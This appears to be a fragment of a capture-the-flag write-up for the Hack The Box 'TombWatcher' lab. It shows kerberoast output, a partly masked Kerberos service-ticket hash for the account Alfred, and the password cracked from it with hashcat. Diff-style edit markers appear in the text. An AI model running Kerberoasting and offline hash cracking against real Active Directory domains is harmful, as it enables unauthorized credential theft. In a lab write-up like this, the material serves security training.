HTB - TombWatcher

 1 | [*] Starting kerberoast attacks |

-We could then crack alfred
+We could then crack alfred domain account hash with hashcat.

 1 | $krb5tgs$23$*Alfred$TOMBWATCHER.HTB$tombwatcher.htb/Alfred*$4ccbc7c414abdcd5f851a537acc1b485$38ffb4axxxxxxxxf39307edf9abdc5e376153287512d3eba4d24fe239d7764e82b9bb7d9699eb30a01d18a17811d17fb16c774c3cec2e7d233e30ffdc2c5cc0467a09262ea1a80592b3fe4b2f8c53fc38262f4496ba1a8fdc25bd7398b9ae31f9eb0acxxxxxxafb83ccd1da8db7eaf052d166524e73e4ef3bc797388d98ac5d97acbed7d650dec7861ae338e1d72c8be716b075cefd8da26c3367a7600a9ec89ae35ae2e511e42d9373d2c0fdf66bae191e856c6b84058fcace335cb1eaa81e266fac952b592587659ed4f5beac0af30bbbf8d436b24339959eb43a8f01daffa0f0081df6afe2cc3d0a4c04219a693647b44037c462f7364667f61fd7e52b60bef04cea0340b0395edebfb2ed8c6eac282f1ef56c435843e58d5b2142cbc9731b6dc6bec00dc27fb5bc9c696bae65e94aa9bc98c8c60d7bccdc22ee993ce0809b12a544b84eb9991b1bfcc2bfb1d07d120180a0c00e4e52c935cdef55610caf4adef0e3a8f4f91d480514da7b8c07c6ed5af23516233a8c21479942b21529066d440988eb3039bb9a2a8d0dd47ce4cad331948bd6b7c2261736c07aae273e308c17ac126e4217f071310c6d8d6d0417dd73da1fe190e6ad627e975adb61e3581cfab70138b8f2588b71dd2bb117468c353f4cccc75b2e0f57aa7e82016f27fdf1dabd3679cb62de9b2ee00551051997cc3992938a1cdfa3ca113681db78725141ce75950c944d72cdba10e90a69ece09fbd94824548822dbe8eba5ed5723b4475dd81ad846c11915780394fef9158d7f0a64f9fe26717a4a962a16f1f401e449a74366f7b4638bc7c8867d102df53c7b1ade5a6874549d085f4a5317eb00d057cb4083f84b3748959950d954002d64cb27e8ce5732a18c766660bd2e389ca2d13a8d7362fd879aeac6306d51c6a15bb896767a71b64294769a26f6146ab4b4508f859b0559eeb95ed7a3a000c10b6e452eacb53c08a36aeaeebd4c4616872be3691b9623779b511421cbdced41e05fc3d5140d0e63054a11296ba4a0a506c476c196b52ecbe5a9ea5d1dd99c86522c9d013eafa90f584b087c74f852befec44cadc751f71696213ff5a5bf5fe7fd9733f1d51da61dbfd3cxxxxxxxxxx96d71a19d05b41ddb181e1cb32f41d5877660e1d3854296e530927942b152ae32826b409e0e6085db02319d96fc4f44061ed6e329df3f418e1524285da393c3ace2be0085470e4cca346bb510bd7d3c74880ccf6b25a38baf3baba363a90700c3cd37c9f659e1efd8b37041c4439016501f6e5602d2425b124187bcae8babadb4882f041ed11c971f6cf2bd5af19f12c1b51c1138af8f9b9e85ac4026740c9e0e2a73f41f98b777fe56c88d3eb8b15f34e29d231e98daaa938c8d13d0b4fc68704d8c01f45921064e645c7b2cb43343c4d428dd5f2d6b44fad43d86c7272d3a17a14bc248cec21b31bdb2cfeb1e9ff32bbb975f91854d640d:basketball |